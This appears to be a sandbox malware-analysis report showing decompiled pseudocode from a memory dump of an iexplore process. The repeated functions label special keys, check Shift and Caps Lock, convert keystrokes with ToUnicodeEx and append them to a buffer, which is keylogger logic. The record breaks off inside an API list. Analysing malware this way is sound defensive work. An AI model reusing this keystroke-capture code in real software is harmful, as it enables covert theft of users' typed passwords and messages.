MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Arrow Right], xrefs: 00C85D78
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85AE2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AE2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F13]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F13], xrefs: 00C85AE4

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C58, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C58(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Insert]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Insert], xrefs: 00C85C5A
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8597D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8597D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Finish]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Finish], xrefs: 00C8597F

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A5A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A5A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Caps Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Caps Lock], xrefs: 00C85A5C

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B15(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F16]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F16], xrefs: 00C85B17

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85BBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BBF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F3]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
